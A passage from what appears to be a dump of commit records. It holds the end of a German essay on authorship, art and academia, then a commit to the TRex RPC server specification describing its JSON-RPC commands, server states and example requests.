rechtssprechung \u00fcber die verbrechen der nationalsozialisten hat sich nichts, aber nat\u00fcrlich auch alles ver\u00e4ndert. Die rechtsverfahren als solche mu\u00dfte nicht abgel\u00f6st, sondern nur modifiziert werden, also bestimmte schritte angepa\u00dft werden. (adresse {})\n\n\n\u2026\n\n{Dies hei\u00dft durchaus nicht, professoren w\u00e4ren zwingend unf\u00e4hig \u2026 Professoren sind ja nicht nur professoren, sondern auch m\u00fctter, k\u00fcnstlerinnen, muslima, w\u00e4hlerin, konsumentin und vielleicht auch etwas verr\u00fcckte blogautorinnen. Das ein professor sich als professor nicht kritisch betrachten kann, hindert ja nicht, da\u00df sie eine skeptische haltung gegen eigenes verhalten in bestimmten rollen einnimmt. Nur wird es mit den jahren handlungs\u2026 immer unwahrscheinlicher, da l\u00e4ngere ein\u00fcbung von erkl\u00e4rungsmuster irritationen gekonnter und \u00bbinnovativer\u00ab disqualifizieren l\u00e4\u00dft. Man kennt das: die wahrscheinlichkeit das ein 5 j\u00e4hriger bezweifelt, da\u00df jungens keine r\u00f6cke tragen sollten ist sehr viel h\u00f6her, als das ein 55 j\u00e4hriger sich dar\u00fcber verbl\u00fcffen l\u00e4\u00dft. Aber das wunder langlebieger wunderei gibt es.\n\n\n\n\n\n\n\n\n\n\n\n\n\n---\n\n \nDa\u00df das problem gerade in der kunst so zentral ist, liegt daran, an verarbeitungstechniken, welche die wissenschaft sich gro\u00dfteilig untersagt, f\u00fcr welche in der kunst ein freiraum geschaffen wurde: Der aneignung und verarbeitung eines themas durch variierte durchf\u00fchrung; die unterscheidung original\/kopie probiert die kunst durch anwendung. (Gerade deshalb gibt es f\u00fcr Kusanowsky auch einen unterschied zwischen dem \u00bbspotler\u00ab und dem \u00bbverbrecher\u00ab. Beide nutzen die kopie f\u00fcr k\u00fcnstlerischen versuche. Jedoch deckt der sportler seine kopie als solche kenntlich macht und zugibt, w\u00e4hrend der verbrecher zugunsten seiner \u00f6konomsichen verwertungsinteressen die kopie nicht als solche zugibt. (Deshalb ist letzteres auch keine k\u00fcnstlerischer verarbeitung der kopie, sondern die kopiertechnik ein mittel wirtschaftlicher profitsteigerung.)\n\n\nhttps:\/\/differentia.wordpress.com\/2016\/08\/10\/kunst-sport-und-verbrechen\/\n\nBeltracchi konnte mit seiner Methode die Struktur der Kunst nicht beeindrucken, Landis dagegen konnte mit der selben Methode f\u00fcr die Beurteilung von Kunst eine Neuerung vorschlagen.\n\n\nDies war nicht immer so und mag sich wieder \u00e4ndern. Vgl. Feyerabend.\n\nAuch maler, zeichner, steinhauer, etc., ja auch komponisten. Ob in den malerischen und musischen produktionsk\u00fcnsten (im gegensatz zu malerischen und musischen exekutionsk\u00fcnsten) die autorkonzeption gleich beschrieben werden kann, wei\u00df ich nicht. Ich vermute ja und nein. Sie lassen sich mit den gleichen strukturen beschreiben, solange vermieden wird zu behaupten, die entwicklungen w\u00e4ren vollst\u00e4ndig analog.\n\n{Was nicht das gleiche ist. Bestimmte offenheit meint hier, da\u00df die anschlie\u00dfenden variativen anschl\u00fcsse immer zweckgebunden (n\u00e4mlich der st\u00fctzung ideal originalgenie) dient. Unbestimmte geschlossenheit meint, da\u00df der begriff originalgenie alle variationen verwendungen zwingt eine universale einortbarkeit in allen bereichen (also einschlu\u00df\/ausschlu\u00df) nach muster des originalgenies zu gew\u00e4hrleisten, mit welchen methoden auch immer.}\n\nIch bin in keiner weise sarkastisch: diese einf\u00fchrung diffizieler und komplizierter techniken finde ich faszinierend und bewundernswert. Ablehnungen des autorkonzepts gehen h\u00e4ufig mit plumper ablehnung vergangener leistungen und dem vorwurf einer gewissen \u00bbverwirrung\u00ab und \u00bbirrt\u00fcmlichkeit\u00ab einher. Ein vokabular, das erstaunlich nah an der abgelehnten konzeption orientiert ist. \u2013 Auch die ablehnung einer _aufrechterhaltung_ des originalautorkonzepts erzwingt aber keinen rousseauistischen romantizismus, der zu einer r\u00fcckkehrt zur nat\u00fcrlichen freiheit der kunst (oder was \u00e4hnlichem) aufruft. \u2026\n\nMeine unterscheidung akademie\/universit\u00e4t ist nicht \u00fcberfl\u00fcssig. Die verbindung von wissenschaft und der lehre dieser wissenschaft bedingt und wird bedingt (durch) bestimmte organisationsformen, die sich auf die forschungst\u00e4tigkeit auswirken: universit\u00e4ten bilden ihr eigenes personal aus. Das gilt f\u00fcr akademien nicht zwingend. \n\nEs ist gar nicht unwahrscheinlich, da\u00df ich einfach etwas nicht gelesen habe. Ich lasse mich dann gerne aufkl\u00e4ren und trage das hier nach. (In die kommentare unten oder an http:\/\/twitter.com\/bertrandterrier[@bertrandterrier].)\n\nIch vermute das \u00e4ndert sich. Durch das internet scheint ein neuer forschertyp erm\u00f6glicht zu werden, dem der einstige privatgelehrte am n\u00e4chsten kommt. Ihn zu beschreiben und zu verfassen ben\u00f6tigt es aber wohl neue beobachtungs- und beschreibungsmittel, die nur unwahrscheinlicherweise von der universit\u00e4ren wissenschaft etabliert werden, da dieser typ ihre gratifikationssicherheiten bedroht.\n\nDies f\u00fchrt zu den schmalhirnigsten \u00e4u\u00dferungen, welche einem manches mal zweifeln lassen, ob an universit\u00e4ten nicht prinzipiell die intelligenz fehle, forschung zu machen. So erz\u00e4hlt mir ein freund, auf die frage, wer denn ein philosoph sei, habe ihm ein dozent geantwortet: Der, der einen philosophischen abschlu\u00df hat. Das ist doof und man hofft auf h\u00f6heres denkverm\u00f6gen bei medizinern und pharmazeuten, von denen das eigene leben abh\u00e4ngt.\n\nInteressant dazu der fall in \u2026, wo ein konservativer staat f\u00fcr die aufnahme syrischer fl\u00fcchtlinge stimmt.\n\nSo paradox das klingt, sieht man\u2019s \u00fcberall: Das grundgesetz ist die neuformulierung der biblischen gebote, die aufkl\u00e4rung ist s\u00e4kularisierte theologie, 2016 ist 1933, etc. Dies hei\u00dft nicht, jede erkl\u00e4rung eines (vermeintlich) neuen ph\u00e4nomens durch ein altes sei prinzipiell schlecht und falsch. Es l\u00e4\u00dft sich jedoch eine selbstverpflichtete blindheit gegen neues beobachten. Jedoch l\u00e4\u00dft sich eine tendenz zur ignoranz neuer ph\u00e4nomene beobachten:\n\n<blockquote class=\"twitter-tweet\" data-lang=\"de\"><p lang=\"de\" dir=\"ltr\">Wenn der Schreiber daf\u00fcr sorgt, dass der Leser nur etwas Bekanntes wiederfindet. kann die Beobachtung von Neuem gut behindert werden.<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/822378844065644544\">20. Januar 2017<\/a><\/blockquote> <script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n\n<blockquote class=\"twitter-tweet\" data-lang=\"de\"><p lang=\"de\" dir=\"ltr\">Die Verhinderung von Neuem gelingt, indem man f\u00fcr den Fortbestand von Nichtsneuem sorgt.<\/p>— Klaus Kusanowsky (@kusanowsky) <a href=\"https:\/\/twitter.com\/kusanowsky\/status\/822377924409987073\">20. Januar 2017<\/a><\/blockquote> <script async src=\"\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n\nDies liegt nicht an der ignoranz einer gro\u00dfe masse von wissenschaftlern; sondern an der festgelegtheit von beobachtungstechnik, welche die eigenen probleme grunds\u00e4tzlich blindsetzt. Es ben\u00f6tigt ja kein kurzes training, um sich die blindsetzung bestimmter probleme und die adelung anderer anzutrainieren (das hat sich bereits auf ca. 30 jahre (grundschule, schule, studium, promotion, habilitation) gesteigert.\n\nIch meine \u00bbfortschritt\u00ab nicht ideologisch, weshalb ich lieber von progression spreche; was nichts anderes hei\u00dft und nur einer verwirrung dient, der autor mache hier wohl auf eine verschobene implikation aufmerksam. Progression ist nicht gut oder schlecht, aber sie ist auch kein rein zeitlicher wechsel von annahmen. Sie meint, sp\u00e4teres bez\u00f6ge sich auf fr\u00fcheres; das g\u00e4lte aber auch f\u00fcr eine kultur, die pl\u00f6tzlich gro\u00dfen technologieverzicht leistet \u2013 insofern dies ja ein weiterschreiten und eben kein zur\u00fcckschreiten ist. (Vergessen ist ein schweres unterfangen: ich schreibe dar\u00fcber hier.)\n\nDer wichtigkeit der subjektentlastung durch adressierbarkeit hat meines wissens nach @ReisAgainst innoviert. Zu einem recht lahmen vortrag zur geschichte des kapitalismus in einem marxistisch-kommunistischen kontext wurden da \u00bbausnutzen\u00ab und \u00bbabh\u00e4ngigkeit\u00ab des arbeiters durch und von den kapitalistischen betriebsbesitzern der \u00bbselbstst\u00e4ndigkeit\u00ab des bauern mit eigenem grundst\u00fcck gegen\u00fcbergestellt. @ReisAgainst machte den (sehr intelligenten) punkt, da\u00df nur der arbeiter \u00fcber eine adresse f\u00fcr beschwerde und forderung habe, w\u00e4hrend dem bauer bei d\u00fcrre ein streik nichts helfe. Zu der bedeutung von adressierbarkeit hoffe ich auf einen text von ihm; da scheint mir fiel interessantes dran zu sein. Es lie\u00dfe sich dann auch fragen, ob nicht die adressierbarkeit von allem an jeden ein problem der modernen b\u00fcrokratie ist. Denn die totalit\u00e4t der adressierbarkeit f\u00fchrt doch gerade dazu, da\u00df jeder angesprochene schlicht auf andere adressen verweis, bis man aufgibt oder mit dem verweis auf die b\u00fcrokratischen verfahren selbst abserviert wird. Vgl. hierzu auch Arendt [MuG: 80]:\n\n____\nB\u00fcroktatie ist diejenige Staatsform, in welcher es niemanden mehr gibt, der Macht aus\u00fcbt; und wo alle gleicherma\u00dfen ohnm\u00e4chtig sind, haben wir eine Tyrannis ohne Tyrannen. \n____\n\n---\n\nLITERATUR\n\nLuhmann, Niklas: Wissenschaft der Gesellschaft (stw 1001), Frankfurt\/M, ^7^2015 [1990]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"75132c65c2927edec9b6beaccf2224561af5bb64","subject":"added handler for every 'owned' or 'active' command changed start_traffic \/ stop_traffic to have array of port id","message":"added handler for every 'owned' or 'active' command\nchanged start_traffic \/ stop_traffic to have array of port id\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"The TRex RPC Server\n===================\n:author: Itay Marom\n:email: <imarom@cisco.com>\n:revnumber: 1.70-0.0\n:quotes.++:\n:numbered:\n:web_server_url: http:\/\/trex-tgn.cisco.com\/trex\n:local_web_server_url: csi-wiki-01:8181\/trex\n\n\n\n== RPC Support On TRex\n\nTRex implements a RPC protocol in order to config, view and\nin general execute remote calls on TRex\n\nIn this document we will provide information on\nhow a client can implement the protocol used to communicate with TRex\n\nIn general, we will describe the following:\n\n* *Transport Layer* - The transport layer used to communicate with TRex server\n* *RPC Reprensentation Protocol* - The format in which remote procedures are carried\n\n=== Transport Layer\n\nTRex server transport layer is implemented using ZMQ.\n\nThe default configuration is TCP on port 5555, however this is configurable.\n\n{zwsp} +\nThe communication model is based on the request-reply ZMQ model:\n\nhttp:\/\/zguide.zeromq.org\/page:all#Ask-and-Ye-Shall-Receive\n\n{zwsp} +\n\nfor more on ZMQ and implementation please refer to:\n{zwsp} +\nhttp:\/\/zeromq.org\/intro:read-the-manual\n\n=== RPC Reprensentation Protocol\n\nThe RPC reprensentation protocol is JSON RPC v2.0.\nEvery request and response will be encoded in a JSON RPC v2.0 format.\n\n{zwsp} +\n\nFor more info on JSON RPC v2.0 spec please refer to:\n{zwsp} +\n\nhttp:\/\/www.jsonrpc.org\/specification\n\n{zwsp} +\n\nLater on in the document we will describe all the supported commands.\n\n=== TRex RPC Mock Server\nBefore we get into the commands, it's worth mentioning that TRex has a mock RPC server\ndesigned to allow playing around with the server in order to understand the response\nand perform adjustments to the request.\n\nTRex also provides a Python based console that can connect to the server (mock or real) and\nsend various commands to the server.\n\n==== Building The Mock Server\nBuilding the mock server is performed like this:\n[source,bash]\n----\ntrex-core\/linux> .\/b configure\ntrex-core\/linux> .\/b --target=mock-rpc-server-64-debug\n----\n\n==== Running The Mock Server\nLaunching the mock server is performed like this:\n\n[source,bash]\n----\n \ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n----\n\n==== Using The TRex Console To Interact\nWhen the mock server is up, you can already send commands to the server.\n{zwsp} +\n{zwsp} +\n\nLet's demonstrate the operation with the Python based TRex console:\n\n{zwsp} +\n\n[source,bash]\n----\ntrex-core\/scripts> .\/trex-console\n\nConnecting To RPC Server On tcp:\/\/localhost:5050\n[SUCCESS]\n\n\n-=TRex Console V1.0=-\n\nType 'help' or '?' for supported actions\n\nTRex >\n\n----\nAs we will see later on, a basic RPC command supported by the server is 'ping'.\n{zwsp} +\nLet's issue a ping command to the server and see what happens on both sides:\n\n{zwsp} +\n{zwsp} +\n\nOn the 'client' side:\n\n[source,bash]\n----\nTRex > verbose on\n\nverbose set to on\n\nTRex > ping\n\n-> Pinging RPC server\n[verbose] Sending Request To Server:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"ping\",\n \"params\": null\n}\n\n[verbose] Server Response:\n\n{\n \"id\": \"l0tog11a\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n[SUCCESS]\n\n----\nOn the 'server' side:\n\n[source,bash]\n----\n\ntrex-core\/scripts> .\/mock-rpc-server-64-debug\n\n-= Starting RPC Server Mock =-\n\nListening on tcp:\/\/localhost:5050 [ZMQ]\n\nSetting Server To Full Verbose\n\nServer Started\n\n\n[verbose][req resp] Server Received:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"method\" : \"ping\",\n \"params\" : null\n}\n\n[verbose][req resp] Server Replied:\n\n{\n \"id\" : \"maa5a3g1\",\n \"jsonrpc\" : \"2.0\",\n \"result\" : \"ACK\"\n}\n\n----\n\n== RPC Server State Machine\nThe RPC server can be in numbered of states, each state provides other subset of the commands\nthat are allowed to be executed.\n\nWe define the following possible states:\n\n* *unowned* - The server is either unowned or another user is owning the device\n* *owned* - The server has been acquired by the client\n* *active* - The server is in the middle of injecting traffic - currently active\n\nEach command will specify on which states it is possible to execute it.\n\nFor commands valid only on 'owned' or 'active', a field called ''handler'' 'MUST' be passed\nalong with the rest of the parameters.\n\n\nThis will identify the connection.\n\nimage::images\/rpc_states.png[title=\"RPC Server States\",align=\"left\",width=200, link=\"images\/rpc_states.png\"]\n\n== RPC Commands\nThe following RPC commands are supported\n\n=== Ping\n* *Name* - 'ping'\n* *Valid States* - 'all'\n* *Description* - Pings the TRex server\n* *Paramters* - None\n* *Result* ['string'] - \"ACK\" On Sucess\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"ping\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"jsonrpc\" : \"2.0\",\n \"id\" : 1,\n \"result\" : \"ACK\"\n}\n\n----\n\n=== Get Registered Commands\n* *Name* - 'get_reg_cmds'\n* *Valid States* - 'all'\n* *Description* - Queries the server for all the registered commands\n* *Paramters* - None\n* *Result* ['array'] - A list of all the supported commands by the server\n\nExample:\n\n[source,bash]\n----\n'Request':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"get_reg_cmds\",\n \"params\": null\n}\n\n\n'Response':\n\n{\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"result\": [\n \"remove_all_streams\",\n \"remove_stream\",\n \"add_stream\",\n \"get_reg_cmds\",\n \"ping\",\n \"test_sub\",\n \"get_version\",\n \"test_add\"\n ]\n}\n\n----\n\n\n=== Get Version\n* *Name* - 'get_version'\n* *Valid States* - 'all'\n* *Description* - Queries the server for version information\n* *Paramters* - None\n* *Result* ['object'] - See table below\n\n.Object type 'return values for get_version' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| version | string | TRex version\n| build_date | string | build date\n| build_time | string | build time\n| built_by | string | who built this version\n|=================\n\n=== Get System Info\n* *Name* - 'get_system_info'\n* *Description* - Queries the server for system properties\n* *Paramters* - None\n* *Result* ['object'] - See table below\n\n.return value: 'get_system_info'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| dp_core_count | int | DP core count\n| core_type | string | DP core type\n| hostname | string | machine host name\n| ip | string | machine IP\n| uptime | string | uptime of the server\n| port_count | int | number of ports on the machine\n| ports | array | arary of object ''port'' - see below\n|=================\n\n.return value: 'get_system_info'.'port'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| driver | string | driver type\n| speed | string | speed of the port (1g, 10g, 40g, 100g)\n| status | string | up \/ down\n|=================\n\n\n=== Get Owner\n* *Name* - 'get_owner'\n* *Valid States* - 'all'\n* *Description* - Queries the server for current owner\n* *Paramters* - None\n* *Result* ['string'] - owner name if exists, otherwise 'none'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_owner\",\n \"params\": null\n}\n\n'Response':\n\n{\n \"id\": \"hxjkuwj9\",\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"owner\": \"itay\"\n }\n}\n\n----\n\n=== Acquire\n* *Name* - 'Acquire'\n* *Valid States* - 'all'\n* *Description* - Takes ownership on the device.\n* *Paramters* -\n** *user* ['string'] - User name aquiring the system\n** *force* ['boolean'] - force action even if another user is holding the device\n* *Result* ['string'] - 'unique' connection handler for future requests\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"Acquire\",\n \"params\": {\n \"force\": false,\n \"user\": \"itay\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"b1tr56yz\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"4cBWDxS2\"\n}\n----\n\n\n=== Release\n* *Name* - 'release'\n* *Valid States* - 'owned'\n* *Description* - Release owernship over the device\n* *Paramters* -\n** *handler* ['string'] - unique connection handler\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"release\",\n \"params\": {\n \"handler\": \"37JncCHr\"\n }\n}\n\n\n'Response':\n\n{\n \"id\": \"m785dxwd\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n----\n\n\n=== Add Stream\n* *Name* - 'add_stream'\n* *Valid States* - 'owned'\n* *Description* - Adds a stream to a port\n* *Paramters* \n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port id associated with this stream\n** *stream_id* ['int'] - stream id associated with the stream object\n** *stream* - object of type xref:stream_obj['stream']\n* *Result* ['string'] - \"ACK\" in case of success\n\n==== Object type 'stream' anchor:stream_obj[]\n\nAdd_stream gets a single parameter of type object.\n\nThe format of that object is as follows:\n\n.Object type 'stream' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description \n| enabled | boolean | is this stream enabled\n| self_start | boolean | is this stream triggered by starting injection or triggered by another stream\n| isg | double | ['usec'] inter stream gap - delay time in usec until the stream is started\n| next_stream | int | next stream to start after this stream. -1 means stop after this stream\n| packet | object | object of type xref:packet_obj['packet']\n| mode | object | object of type xref:mode_obj['mode']\n| vm | array | array of objects of type xref:vm_obj['vm']\n| rx_stats | object | object of type xref:rx_stats_obj['rx_stats']\n|=================\n\n===== Object type 'packet' anchor:packet_obj[]\npacket contains binary and meta data\n\n.Object type 'packet'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| binary | byte array | binary dump of the packet to be used in the stream as array of bytes\n| meta | string | meta data object. opaque to the RPC server. will be passed on queries\n|=================\n\n===== Object type 'mode' anchor:mode_obj[]\nmode object can be 'one' of the following objects:\n\n.Object type 'mode - continuous' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''continuous''\n| pps | double | rate in packets per second \n|=================\n\n.Object type 'mode - single_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''single_burst''\n| pps | double | rate in packets per second \n| total pkts | int | total packets in the burst\n|=================\n\n.Object type 'mode - multi_burst' \n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''multi_burst''\n| pps | int | rate in packets per second \n| pkts_per_burst | int | packets in a single burst\n| ibg | double | ['usec'] inter burst gap. delay between bursts in usec\n| count | int | number of bursts. ''0'' means loop forever, ''1'' will fall back to single burst\n|=================\n\n===== Object type 'vm' anchor:vm_obj[]\nArray of VM instruction objects to be used with this stream\n\nAny element in the array can be one of the following object types:\n\n.Object type 'vm - fix_checksum_ipv4'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''fix_checksum_ipv4''\n| pkt_offset | uint16 | offset of the field to fix \n|=================\n\n.Object type 'vm - flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''flow_var'''\n| name | string | flow var name - this should be a unique identifier\n| size | [1,2,4,8] | size of the flow var in bytes\n| op | ['inc', 'dec', 'random'] | operation type to perform on the field\n| init value | uint64_t as string | init value for the field\n| min value | uint64_t as string | minimum value for the field\n| max value | uint64_t as string | maximum value for the field\n|=================\n\n.Object type 'vm - write_flow_var'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| type | string | ''write_flow_var''\n| name | string | flow var name to write\n| pkt_offset | uint16 | offset at the packet to perform the write\n| add_value | int | delta to add to the field prior to writing - can be negative\n| is_big_endian | boolean | should write as big endian or little \n|=================\n\n\n===== Object type 'rx_stats' anchor:rx_stats_obj[]\nDescribes rx stats for the stream\n\n{zwsp} +\n\n'IMPORTANT':\n\nIn case rx_stats is enabled, meta data will be written in the end of the packet.\n\nplease consider the following:\n\n==== Constrains\n* *performance* - this will have performance impact as rx packets will be examined\n* *override* - up to 10 bytes at the end of the packet will be overidden by the meta data required\n\n==== The bytes needed for activating 'rx_stats':\n\n* *rx_stream_id* consumes 2 bytes\n* *seq_enabled* consumes 4 bytes\n* *latency_enabled* consumes 4 bytes\n\nso if no seq or latency are enabled 2 bytes will be used.\n\n\nif seq or latency alone are enabled, 6 bytes will be used.\n\n\nif both are enabled then 10 bytes will be used.\n\n\n.Object type 'rx_stats'\n[options=\"header\",cols=\"1,1,3\"]\n|=================\n| Field | Type | Description\n| enabled | boolean | is rx_stats enabled for this stream\n| seq_enabled | boolean | should write 32 bit sequence\n| latency_enabled | boolean | should write 32 bit latency\n|=================\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"add_stream\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1,\n\t\"stream_id\": 502\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"total_pkts\": 5000,\n \"type\": \"single_burst\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"rx_stats\": {\n \"enabled\": false\n },\n \"self_start\": true,\n }\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Remove Stream\n* *Name* - 'remove_stream'\n* *Valid States* - 'owned'\n* *Description* - Removes a stream from a port\n* *Paramters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port assosicated with the stream.\n** *stream_id* ['int'] - stream to remove\n\n* *Result* ['string'] - \"ACK\" in case of success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_stream\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1,\n \"stream_id\": 502\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n----\n\n=== Get Stream ID List\n* *Name* - 'get_stream_list'\n* *Valid States* - 'owned', 'active'\n* *Description* - fetch all the assoicated streams for a port\n* *Paramters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port to query for registered streams\n\n* *Result* ['array'] - array of 'stream_id'\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream_list\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": [\n 502,\n 18\n ]\n}\n\n\n----\n\n=== Get Stream\n* *Name* - 'get_stream'\n* *Valid States* - 'owned', 'active'\n* *Description* - get a specific stream object\n* *Paramters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port for the associated stream\n** *stream_id* ['int'] - the requested stream id\n\n* *Result* ['object'] - object xref:stream_obj['stream']\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"get_stream\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 1,\n \"stream_id\": 7\n }\n}\n\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": {\n \"stream\": {\n \"enabled\": true,\n \"isg\": 4.3,\n \"mode\": {\n \"pps\": 3,\n \"type\": \"continuous\"\n },\n \"next_stream_id\": -1,\n \"packet\": {\n \"binary\": [\n 4,\n 1,\n 255\n ],\n \"meta\": \"\"\n },\n \"self_start\": true\n }\n }\n}\n\n----\n\n\n=== Remove All Streams\n* *Name* - 'remove_all_streams'\n* *Valid States* - 'owned'\n* *Description* - remove all streams from a port\n* *Paramters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['int'] - port for the associated stream\n\n* *Result* ['string'] - \"ACK\" on success\n\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"method\": \"remove_all_streams\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": 2\n }\n}\n\n'Response':\n\n{\n \"id\": 1,\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n=== Start Traffic\n* *Name* - 'start_traffic'\n* *Valid States* - 'owned'\n* *Description* - Starts the traffic on a specific port. if traffic has already started an error will be returned\n* *Paramters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['array'] - array of port id on which to start traffic\n\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{ \n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"start_traffic\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": [3, 4]\n }\n\n'Response':\n\n{\n \"id\": \"b3llt8hs\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n=== Stop Traffic\n* *Name* - 'stop_traffic'\n* *Valid States* - 'active'\n* *Description* - Stops the traffic on a specific port. if the port has already started nothing will happen\n* *Paramters*\n** *handler* ['string'] - unique connection handler\n** *port_id* ['array'] - array of port id on which to stop traffic\n\n* *Result* ['string'] - \"ACK\" on success\n\n[source,bash]\n----\n\n'Request':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"method\": \"stop_traffic\",\n \"params\": {\n \"handler\": \"37JncCHr\",\n \"port_id\": [3, 4]\n }\n}\n\n'Response':\n\n{\n \"id\": \"h2fyhni7\",\n \"jsonrpc\": \"2.0\",\n \"result\": \"ACK\"\n}\n\n\n----\n\n\n","old_contents":"The TRex RPC Server\n===================\n:author: Itay Marom\n:email: <imarom@cisco.com>\n:revnumber: 1.70-0.0\n:quotes.++:\n:numbered:\n:web_server_url: http:\/\/trex-tgn.cisco.com\/trex\n:local_web_server_url: csi-wiki-01:8181\/trex\n\n\n\n== RPC Support On TRex\n\nTRex implements a RPC protocol in order to config, view and\nin general execute remote calls on TRex\n\nIn this document we will provide information on\nhow a client can implement the protocol used to communicate with TRex\n\nIn general, we will describe the following:\n\n* *Transport Layer* - The transport layer used to communicate with TRex server\n* *RPC Reprensentation Protocol* - The format in which remote procedures are carried\n\n=== Transport Layer\n\nTRex server transport layer is implemented using ZMQ.\n\nThe default configuration is TCP on port 5555, however this is configurable.\n\n{zwsp} +\nThe communication model is based on the request-reply ZMQ model:\n\nhttp:\/\/zguide.zeromq.org\/page:all#Ask-and-Ye-Shall-Receive\n\n{zwsp} +\n\nfor more on ZMQ and implementation please refer to:\n{zwsp} +\nhttp:\/\/zeromq.org\/intro:read-the-manual\n\n=== RPC Reprensentation Protocol\n\nThe RPC reprensentation protocol is JSON RPC v2.0.\nEvery request and response will be encoded in a JSON RPC v2.0 format.\n\n{zwsp} +\n\nFor more info on JSON RPC v2.0 spec please refer to:\n{zwsp} +\n\nhttp:\/\/www.jsonrpc.org\/specification\n\n{zwsp} +\n\nLater on in the document we will describe all the supported commands.\n\n=== TRex RPC Mock Server\nBefore we get into the commands, it's worth mentioning that TRex has a mock RPC server\ndesigned to allow playing around with the server in order to understand the response\nand perform adjustments to the request.\n\nTRex also provides a Python based console that can connect to the server (mock or real) and\nsend various commands to the server.\n\n==== Building The Mock Server\nBuilding the mock server is performed like 